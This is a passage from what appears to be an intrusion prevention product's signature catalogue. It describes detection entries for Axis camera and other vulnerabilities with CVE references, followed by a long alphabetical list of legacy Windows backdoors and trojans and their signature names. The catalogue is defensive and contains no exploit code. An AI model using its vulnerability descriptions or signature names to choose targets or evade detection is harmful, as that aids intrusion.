Description:	A vulnerability in Axis IP cameras using AXIS Camera Application Platform, with Axis M3044-V firmware 9.80.3.8, which allows remote attackers to upload and execute eap applications on the target device, due to insufficient validation of the source.
Situation:	HTTP_CS-Axis-IP-Camera-Application-Upload

Axis-Media-Control-Unsafe-ActiveX-Method

About this vulnerability:

An attempt to exploit a vulnerability in an AXIS device detected

Risk:

High

First detected in:

sgpkg-ips-1772-5242

Last changed:

sgpkg-ips-1772-5242

Platform:

Generic

Software:

AXIS Camera Application Platform

Type:

Input Validation

Description:

A vulnerability in AXIS network camera devices, version 6.2.10.11, which allows remote attackers to create or overwrite arbitrary files via a file path to the StartRecord, SaveCurrentImage, or StartRecordMedia methods.

Situation:

File-Text_Axis-Media-Control-Unsafe-ActiveX-Method

References:

CVE-2013-3543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3543

Axis-Network-Camera-Remote-Code-Execution

About this vulnerability:

A vulnerability in Axis Network Camera

Risk:

High

First detected in:

sgpkg-ips-1112-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AXIS Camera Control

Type:

Code Injection

Description:

A vulnerability in Axis Network Cameras which allows remote attackers to execute arbitrary code as root through parhand parameters.

Situation:

File-Text_Axis-Network-Camera-Remote-Code-Execution

References:

CVE-2018-10660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10660

axTLS-UTC-Time-Parse-Error

About this vulnerability:

A vulnerability in axTLS

Risk:

High

First detected in:

sgpkg-ips-1116-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

axTLS

Type:

Malfunction

Description:

axTLS version 1.5.3 has a vulnerability where it interprets a UTCTime value in a X.509 certificate against the X.509 Certificate RFC. The RFC specifies that a yeah value of 50 or greater should be interpreted as year 19XX. However the axTLS version 1.5.3 interprets the UTCTime year 50 as year 2050.

Situation:

HTTPS_SS-TLS-Certificate-Suspicious-UTCTime-Validity-End-Time

References:

CVE-2017-1000416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000416

Azeotech-DAQFactory-NETB-Buffer-Overflow

About this vulnerability:

A vulnerability in Azeotech DAQFactory

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Azeotech DAQFactory

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow in Azeotech DAQFactory which allows remote attackers to cause a denial of service or to execute arbitrary code via a crafted NETB UDP packet.

Situation:

Generic_UDP-Azeotech-DAQFactory-NETB-Buffer-Overflow

References:

CVE-2011-3492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3492

OSVDB-75496
http://www.osvdb.org/75496

AZORult-Stealer-C2-Traffic

About this vulnerability:	AZORult stealer C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1119-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	AZORult is an information stealer. It's also capable to download more malware to the infected system.
Situation:	HTTP_CS-AZORult-Stealer-C2-Traffic

B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow

About this vulnerability:

B Labs Bopup Communication Server Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-653-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

B Labs Bopup

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in B Labs Bopup Communication Server 3.2.26.5460 which allows attackers to remotly execute arbitrary code via a crafted TCP request.

Situation:

Generic_CS-B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow
Generic_CS-B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow-2

References:

CVE-2009-2227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2227

OSVDB-55275
http://www.osvdb.org/55275

Backdoor-Agobot

About this vulnerability:	Agobot is an IRC controlled backdoor
Risk:	High
First detected in:	sgpkg-ips-39-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Agobot
Type:	Backdoor
Description:	Agobot is an IRC controlled trojan that can be used, for example, to remotely control the host, launch DDOS attacks and infect new hosts. When Agobot infects a host, the new bot will join an IRC channel and execute commands given to it as messages.

Backdoor-Alvgus

About this vulnerability:	Backdoor Alvgus activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Alvgus
Type:	Backdoor
Description:	Alvgus is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-UDP_Alvgus-Request BD-UDP_Alvgus-Response

Backdoor-Amanda

About this vulnerability:	Backdoor Amanda activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Amanda
Type:	Backdoor
Description:	Amanda is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Amanda-Request BD-TCP_Amanda-Response

Backdoor-AOL-Admin

About this vulnerability:	Backdoor AOL Admin activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	AOL Admin
Type:	Backdoor
Description:	AOL Admin backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_AOL-Admin-Response

Backdoor-Asylum

About this vulnerability:

Asylum backdoor activity

Risk:

High

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Asylum

Type:

Backdoor

Description:

Asylum backdoor allows a remote attacker to control the infected system via a specific client program.

Situation:

BD-TCP_Asylum-Request
BD-TCP_Asylum-Response

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Backage

About this vulnerability:	Backdoor Backage activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Backage
Type:	Backdoor
Description:	Backage is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Backage-Request

Backdoor-BackConstruction

About this vulnerability:	Backdoor BackConstruction activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	BackConstruction
Type:	Backdoor
Description:	BackConstruction backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_BackConstruction-Request BD-TCP_BackConstruction-Response

Backdoor-BackDoor

About this vulnerability:

BackDoor program activity

Risk:

High

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 95; Windows NT; Windows 98

Software:

Back Door

Type:

Backdoor

Description:

"BackDoor" is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_BackDoor-Request
BD-TCP_BackDoor-Response

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-BackOrifice2000

About this vulnerability:

Back Orifice 2000

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Back Orifice 2000 is a remote control program that is often installed by a malware program. The program allows a remote attacker to silently control and spy the target system.

Situation:

BD-TCP_Back-Orifice-2000
BD-TCP_Chupacabra
BD-UDP_Back-Orifice

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Balsitix

About this vulnerability:	Balsitix backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Balsitix
Type:	Backdoor
Description:	Balsitix backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-UDP_Balsitix-Response

Backdoor-Basic-Hell

About this vulnerability:	Backdoor Basic Hell activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Basic Hell
Type:	Backdoor
Description:	Basic Hell is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Basic-Hell-Response

Backdoor-BDDT

About this vulnerability:

BDDT backdoor

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

BDDT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_BDDT-Response

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Bigorna

About this vulnerability:

Bigorna backdoor

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Bigorna is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_One-Response

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-BioNet

About this vulnerability:

Backdoor BioNet activity

Risk:

High

First detected in:

sgpkg-ips-7-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

BioNet

Type:

Backdoor

Description:

BioNet backdoor allows a remote attacker to control the infected system.

Situation:

BD-TCP_BioNet-Request
BD-TCP_BioNet-Response

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-BLA

About this vulnerability:	Backdoor BLA activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	BLA
Type:	Backdoor
Description:	BLA is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-UDP_BLA-Request

Backdoor-Black-Angel

About this vulnerability:	Black Angel backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Black Angel
Type:	Backdoor
Description:	Black Angel is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Black-Angel-Response

Backdoor-Blade-Runner

About this vulnerability:	Blade Runner backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Blade Runner
Type:	Backdoor
Description:	Blade Runner is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Blade-Runner-Response

Backdoor-Blazer5

About this vulnerability:	Backdoor Blazer5 activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Blazer5
Type:	Backdoor
Description:	Blazer5 backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Blazer5-Response-In-Default-Port BD-TCP_Blazer5-Response

Backdoor-Blood-Fest-Evolution

About this vulnerability:	Backdoor Blood Fest Evolution activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Blood Fest Evolution
Type:	Backdoor
Description:	Blood Fest Evolution is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Blood-Fest-Evolution-Respose

Backdoor-Breach

About this vulnerability:	Breach backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98; Windows NT
Software:	Breach
Type:	Backdoor
Description:	Breach is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Breach-Response

Backdoor-Bugs

About this vulnerability:	Bugs backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98; Windows NT
Software:	Bugs
Type:	Backdoor
Description:	Bugs is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Bugs-Response-In-Default-Port BD-TCP_Bugs-Response

Backdoor-Buschtrommel

About this vulnerability:

Buschtrommel backdoor

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

BuschtrommelD is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Buschtrommel

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-ButtMan

About this vulnerability:	Backdoor ButtMan activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ButtMan
Type:	Backdoor
Description:	ButtMan is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_ButtMan-Request

Backdoor-CAFEiNi

About this vulnerability:	Backdoor CAFEiNi activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	CAFEiNi
Type:	Backdoor
Description:	CAFEiNi is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_CAFEiNi-Response

Backdoor-Celine

About this vulnerability:	Backdoor Celine activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Celine
Type:	Backdoor
Description:	Celine is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Celine-Response

Backdoor-Cero

About this vulnerability:	Backdoor Cero activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Cero
Type:	Backdoor
Description:	Cero is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Cero-Response

Backdoor-Connection

About this vulnerability:	Backdoor Connection activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Connection
Type:	Backdoor
Description:	Connection backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Connection-Response

Backdoor-Crack-Down

About this vulnerability:	Crack Down backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Cray Down
Type:	Backdoor
Description:	Crack Down is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Crack-Down-Response

Backdoor-CrazzyNet

About this vulnerability:	Backdoor CrazzyNet activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	CrazzyNet
Type:	Backdoor
Description:	CrazzyNet backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_CrazzyNet-Response

Backdoor-Danton

About this vulnerability:	Backdoor Danton activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Danton
Type:	Backdoor
Description:	Danton is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Danton-Response

Backdoor-Dark-Connection-Inside

About this vulnerability:	Backdoor Dark Connection Inside activity
Risk:	High
First detected in:	sgpkg-ips-7-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Dark Connection Inside
Type:	Backdoor
Description:	Dark Connection Inside is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Dark-Connection-Inside-Response

Backdoor-Deep-Throat

About this vulnerability:	Backdoor Deep Throat activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Deep Throat
Type:	Backdoor
Description:	Deep Throat backdoor allows a remote attacker to control the infected system.
Situation:	BD-UDP_Deep-Throat-Response-2 BD-UDP_Deep-Throat-Response

Backdoor-DFch-Grisch

About this vulnerability:

DFch Grisch backdoor

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

DFch Grisch is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_DFch-Grisch

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Digital-Rootbeer

About this vulnerability:

Digital Rootbeer backdoor

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Digital Rootbeer is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Digital-Rootbeer

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Doly

About this vulnerability:

Backdoor Doly activity

Risk:

High

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Doly

Type:

Backdoor

Description:

Doly backdoor allows a remote attacker to control the infected system.

Situation:

BD-TCP_Dolly-Request
BD-TCP_Doly-1-7-Request
BD-TCP_Doly-Response

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Donald-Dick

About this vulnerability:	Donald Dick activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98; Windows NT
Software:	Donald Dick
Type:	Backdoor
Description:	Donald Dick is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Donald-Dick-Response

Backdoor-Drat

About this vulnerability:	Backdoor Drat activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Drat
Type:	Backdoor
Description:	Drat is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Drat-Response

Backdoor-DTr

About this vulnerability:	DTr backdoor activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	DTr
Type:	Backdoor
Description:	DTr is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_DTr-Response

Backdoor-Duddie

About this vulnerability:

Duddie backdoor

Risk:

High

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Duddie is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Duddie
BD-TCP_Duddie-2.0
BD-TCP_Duddie-3.1
BD-TCP_Duddie-3.2
BD-TCP_EventHorizon

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-ENM-Malware

About this vulnerability:	Backdoor EMN malware
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Backdroon-ENM is a Windows malware.
Situation:	HTTP_CRL-Backdoor-ENM-Detected

Backdoor-Executor

About this vulnerability:

Executor backdoor

Risk:

High

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Executor is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

HTTP_CS-Executor-Backdoor

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Exploiter

About this vulnerability:	Backdoor Exploiter activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98; Windows ME
Software:	Exploiter
Type:	Backdoor
Description:	Exploiter is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Exploiter-Response

Backdoor-F-Backdoor

About this vulnerability:	Backdoor F-Backdoor activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	F-Backdoor
Type:	Backdoor
Description:	F-Backdoor is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_F-Backdoor-Response

Backdoor-Forced-Entry

About this vulnerability:	Backdoor Forced Entry activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Forced Entry
Type:	Backdoor
Description:	Forced Entry backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Forced-Entry-Response

Backdoor-Fore

About this vulnerability:	Fore backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98
Software:	Fore
Type:	Backdoor
Description:	Fore backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_Fore-Response

Backdoor-Frenzy

About this vulnerability:	Backdoor Frenzy activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98
Software:	Frenzy
Type:	Backdoor
Description:	Frenzy backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Frenzy-Response

Backdoor-Frenzy-2000

About this vulnerability:

Frenzy 2000 backdoor

Risk:

High

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Frenzy 2000 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Frenzy-2000

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-GateCrasher

About this vulnerability:	Backdoor GateCrasher activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	GateCrasher
Type:	Backdoor
Description:	GateCrasher backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_GateCrasher-Response

Backdoor-Ghost

About this vulnerability:	Backdoor Ghost activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Ghost
Type:	Backdoor
Description:	Ghost is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Ghost-Response

Backdoor-Gift-Latinus-Pest

About this vulnerability:	Backdoor Gift/Latinus/Pest activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Gift-Latinus-Pest
Type:	Backdoor
Description:	Gift/Latinus/Pest is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Gift-Latinus-Pest-Response

Backdoor-GirlFriend

About this vulnerability:	GirlFriend backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	GirlFriend
Type:	Backdoor
Description:	GirlFriend backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_GirlFriend-Response

Backdoor-Glacier

About this vulnerability:

Glacier backdoor

Risk:

High

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Glacier is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Glacier
BD-TCP_Konik
BD-TCP_Remote-Explorer

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Gspot

About this vulnerability:	Backdoor Gspot activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Gspot
Type:	Backdoor
Description:	Gspot is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Gspot-Response

Backdoor-Hack-A-Tack

About this vulnerability:

Hack-a-tack backdoor

Risk:

High

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Hack-a-tack is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Hack-A-Tack
BD-TCP_Hackers-World

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Hellz-Addiction

About this vulnerability:	Backdoor Hellz Addiction activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Hellz Addiction
Type:	Backdoor
Description:	Hellz Addiction is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Hellz-Addiction-Response

Backdoor-Host-Control

About this vulnerability:	Backdoor Host Control activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 98; Windows 95
Software:	Host Control
Type:	Backdoor
Description:	Host Control backdoor allows a remote attacker to control the infected system via a specific client program.
Situation:	BD-TCP_Host-Control-Response

Backdoor-InCommand

About this vulnerability:	Backdoor InCommand activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	InCommand
Type:	Backdoor
Description:	InCommand is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_InCommand-Response

Backdoor-Infector

About this vulnerability:	Backdoor Infector activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Infector
Type:	Backdoor
Description:	Infector backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Infector-Response

Backdoor-Insane-Network

About this vulnerability:	Backdoor Insane Network activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Insane Network
Type:	Backdoor
Description:	Insane Network is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system.
Situation:	BD-TCP_Insane-Network-Response

Backdoor-Intruzzo

About this vulnerability:

Intruzzo backdoor

Risk:

High

First detected in:

sgpkg-ips-254-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Intruzzo is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Intruzzo

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Kid-Terror

About this vulnerability:	Backdoor Kid Terror activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Kid Terror
Type:	Backdoor
Description:	Kid Terror is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Kid-Terror-Response

Backdoor-Kuang2-Virus

About this vulnerability:	Backdoor Kuang2 Virus activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98
Software:	Kuang2
Type:	Backdoor
Description:	Kuang2 Virus backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Kuang2-Virus-Response

Backdoor-Last2000

About this vulnerability:

Last2000 backdoor

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Backdoor

Description:

Last2000 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.

Situation:

BD-TCP_Last2000

References:

CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660

Backdoor-Leszcz

About this vulnerability:	Backdoor Leszcz activity
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Leszcz
Type:	Backdoor
Description:	Leszcz backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Leszcz-Response

Backdoor-Lithium

About this vulnerability:

Lithium backdoor

Risk:

High

First detected in:

sgpkg-ips-255-3038

